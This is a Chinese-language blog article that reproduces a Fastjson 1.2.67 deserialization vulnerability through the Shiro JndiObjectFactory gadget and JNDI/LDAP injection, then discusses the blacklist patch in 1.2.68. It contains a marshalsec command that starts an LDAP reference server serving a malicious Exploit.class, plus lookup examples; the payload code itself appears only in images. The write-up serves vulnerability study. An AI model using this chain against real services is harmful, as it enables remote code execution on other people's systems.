如何分析Fastjson漏洞的环境搭建及漏洞复现

蜗牛 互联网技术资讯 2021-12-10 317 0

今天就跟大家聊聊有关如何分析Fastjson漏洞的环境搭建及漏洞复现,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

0x01 Fastjson简介

Fastjson 是Alibaba的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 
https://github.com/alibaba/fastjson

0x02 环境搭建

JDK 版本:8u112

fastjson: 1.2.67

shiro: 1.5.1

slf4j-nop: 1.7.25

0x1 添加依赖包

为了快速添加项目所需要的jar包,创建Maven项目如下

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第1张

pom.xml

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第2张

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第3张

之后右键pom.xml 点击下载source和document

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第4张

0x2 选择JDK版本

该漏洞选择JDK 8u112

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第5张

0x3 编写漏洞代码

在main文件夹中添加漏洞代码,核心在于调用了fastjson.JSON的parseObject 函数

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第6张

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第7张

0x03 漏洞原理

0x1 FastJson 类解析

Fastjson接口简单易用,广泛使用在缓存序列化、协议交互、Web输出、Android客户端提供两个主要接口toJsonString和parseObject来分别实现序列化和反序列化。

FastJson中的 parse 和 parseObject方法都可以用来将JSON字符串反序列化成Java对象,parseObject 本质上也是调用 parse 进行反序列化的。但是 parseObject 会额外的将Java对象转为 JSONObject对象,即 JSON.toJSON。所以进行反序列化时的细节区别在于,parse 会识别并调用目标类的 setter 方法及某些特定条件的 getter 方法,而 parseObject 由于多执行了 JSON.toJSON(obj),所以在处理过程中会调用反序列化目标类的所有 setter 和 getter 方法。

fastjson.java

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第8张

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第9张

由结果可以看出调用parseObject 函数会调用getattr方法。

0x2 漏洞调用链分析

调用栈分析

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第10张

1. parseObject 对象类型转换

这一步的操作是将obj对应的对象类型转化为json格式,这势必要方位getattr 对象方法,从而触发漏洞。

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第11张

2. 反射调用

通过invoke方法,调用getinstance方法

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第12张

3. 触发ldap

在JndiObjectFactory getinstance 中调用了this.lookup(resourceName)

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第13张

0x3 JNDI 注入

Java Name Directory Interface,Java命名和目录接口(JNDI)是一种Java API,类似于一个索引中心,它允许客户端通过name发现和查找数据和对象。JNDI包括Naming Service和Directory Service,通过名称来寻找数据和对象的API,也称为一种绑定。JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第14张

其应用场景比如:动态加载数据库配置文件,从而保持数据库代码不变动等。

注入方法:

  1. JNDI Reference 配合 RMI

  2. JNDI Reference 配合 LDAP

RMI格式:ctx.lookup("
rmi://localhost:9999/refObj");

LDAP格式ctx.lookup("
ldap://localhost:9999/refObj");

若lookup函数中的参数攻击者可控,便可以指向攻击者的服务器,即可实现JNDI注入实现任意代码执行。

1 RMI

RMI(Remote Method Invocation,远程方法调用)。远程方法调用是分布式编程中的一个基本思想,实现远程方法调用的技术有CORBA、WebService等(这两种独立于编程语言)。RMI则是专门为JAVA设计,依赖JRMP通讯协议。

2 LDAP

LDAP(Lightweight Directory Access Protocol ,轻型目录访问协议)是一种目录服务协议,运行在TCP/IP堆栈之上。目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,能进行查询、浏览和搜索,以树状结构组织数据。LDAP以树结构标识所以不能像表格一样用SQL语句查询,它“读”性能很强,但“写”性能较差,并且没有事务处理、回滚等复杂功能,不适于存储修改频繁的数据。LDAP目录和RMI注册表的区别在于是前者是目录服务,并允许分配存储对象的属性。

该漏洞简单的将利用org.apache.shiro 包中的jndi功能访问自己搭建的ldap服务,获取并执行自己编译的Exploit.class文件。

0x04 漏洞利用

0x1 编译Java 利用代码

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第15张

0x2 开启 LDAP 服务

使用marshalsec启动一个ladp服务器 ,下载地址为
https://github.com/mbechler/marshalsec

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8089/#Exploit

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第16张

0x3 开启HTTP Web 服务

将编译好的Exploit.class 放在web目录下并开启服务

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第17张

0x05 漏洞补丁

这个链接梳理了fastjson hash对应的jar,可以方便的寻找已经被过滤的jar包
https://github.com/LeadroyaL/fastjson-blacklist

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第18张

该漏洞采用黑名单的方式进行修补,在1.2.68中把org.apache.shiro.jndi 给ban掉了

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第19张

对应的具体代码如下图所示,在 public Class<?> checkAutoType(String typeName, Class<?> expectClass, int features) 函数中有对应处理

黑名单hash生成算法,大概思路是将每一位都异或进行异或叠加。

如何分析Fastjson漏洞的环境搭建及漏洞复现  fastjson 第20张

看完上述内容,你们对如何分析Fastjson漏洞的环境搭建及漏洞复现有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注蜗牛博客行业资讯频道,感谢大家的支持。

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:niceseo99@gmail.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

评论

有免费节点资源,我们会通知你!加入纸飞机订阅群

×
天气预报查看日历分享网页手机扫码留言评论Telegram